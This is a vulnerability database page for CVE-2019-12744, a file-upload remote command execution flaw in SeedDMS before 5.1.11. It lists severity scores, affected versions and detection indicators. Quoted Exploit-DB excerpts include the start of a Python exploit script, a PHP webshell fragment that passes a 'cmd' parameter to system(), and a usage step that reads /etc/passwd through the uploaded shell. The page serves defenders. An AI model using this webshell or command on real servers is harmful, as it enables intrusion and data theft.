CVE-2019-12744
published 2019-06-20CVE-2019-12744: SeedDMS before 5.1.11 allows Remote Command Execution (RCE) because of unvalidated file upload of PHP scripts, a different vulnerability than CVE-2018-12940.
PriorityP261high7.5CVSS 3.0
AVNACHPRLUINSUCHIHAH
EXPLOIT
EPSS
11.70%
95.5th percentile
SeedDMS before 5.1.11 allows Remote Command Execution (RCE) because of unvalidated file upload of PHP scripts, a different vulnerability than CVE-2018-12940.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| seeddms | seeddms | < 5.1.11 | 5.1.11 |
Detection & IOCsextracted from sources · hover to see the quote
- →Alert on HTTP GET or POST requests to the path pattern /data/1048576/<numeric_id>/1.php, which is the fixed storage path where SeedDMS saves uploaded document versions and where the webshell is accessed ↗
- →Detect upload of files with .php extension to /op/op.AddDocument.php; legitimate document uploads should not include PHP scripts ↗
- →Monitor for the presence of the session cookie 'mydms_session' combined with POST requests to document upload endpoints as an indicator of authenticated exploitation attempts ↗
- →Detect PHP webshell content pattern using $_REQUEST['cmd'] with system() call written to files under /data/1048576/ ↗
- ·The document storage path /data/1048576/ is described as a default; installations may use a different base data directory, so detection rules should account for configurable paths ↗
- ·Exploitation requires valid authenticated credentials; unauthenticated access to upload endpoints will fail, so brute-force or credential-stuffing against /op/op.Login.php may precede the RCE ↗
- ·The uploaded PHP webshell filename is randomly generated (20 lowercase characters) with a .php extension, making static filename-based detection insufficient; path pattern /data/1048576/<docID>/1.php is more reliable as the version file is always named 1.php ↗
CVSS provenance
nvdv3.07.5HIGHCVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.06.0MEDIUMAV:N/AC:M/Au:S/C:P/I:P/A:P
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)
exploitdb·2021-06-25·CVSS 7.5
CVE-2019-12744 [HIGH] Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)
Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)
---
# Exploit Title: Seeddms 5.1.10 - Remote Command Execution (RCE) (Authenticated)
# Date: 25/06/2021
# Exploit Author: Bryan Leong
# Vendor Homepage: https://www.seeddms.org/index.php?id=2
# Software Link: https://sourceforge.net/projects/seeddms/files/seeddms-5.0.11/
# Version: Seeddms 5.1.10
# Tested on: Windows 7 x64
# CVE: CVE-2019-12744
import requests
import argparse
import sys
import random
import string
from bs4 import BeautifulSoup
from requests_toolbelt import MultipartEncoder
def sysArgument():
ap = argparse.ArgumentParser()
ap.add_argument("-u", "--username", required=True, help="login username")
ap.add_argument("-p", "--password", required=True, help="login password")
ap.add_argument("--url", required=True
Exploit-DB
SeedDMS versions < 5.1.11 - Remote Command Execution
exploitdb·2019-06-24·CVSS 7.5
CVE-2019-12744 [HIGH] SeedDMS versions < 5.1.11 - Remote Command Execution
SeedDMS versions ";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "";
die;
}
?>
Step 3: Now after uploading the file check the document id corresponding to the document.
Step 4: Now go to example.com/data/1048576/"document_id"/1.php?cmd=cat+/etc/passwd to get the command response in browser.
Note: Here "data" and "1048576" are default folders where the uploaded files are getting saved.
No writeups or analysis indexed.
http://packetstormsecurity.com/files/153383/SeedDMS-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/163283/Seeddms-5.1.10-Remote-Command-Execution.htmlhttps://secfolks.blogspot.com/2019/06/exploit-for-cve-2019-12744-remote.htmlhttps://sourceforge.net/p/seeddms/code/ci/master/tree/CHANGELOGhttp://packetstormsecurity.com/files/153383/SeedDMS-Remote-Command-Execution.htmlhttp://packetstormsecurity.com/files/163283/Seeddms-5.1.10-Remote-Command-Execution.htmlhttps://secfolks.blogspot.com/2019/06/exploit-for-cve-2019-12744-remote.htmlhttps://sourceforge.net/p/seeddms/code/ci/master/tree/CHANGELOG
2019-06-20
Published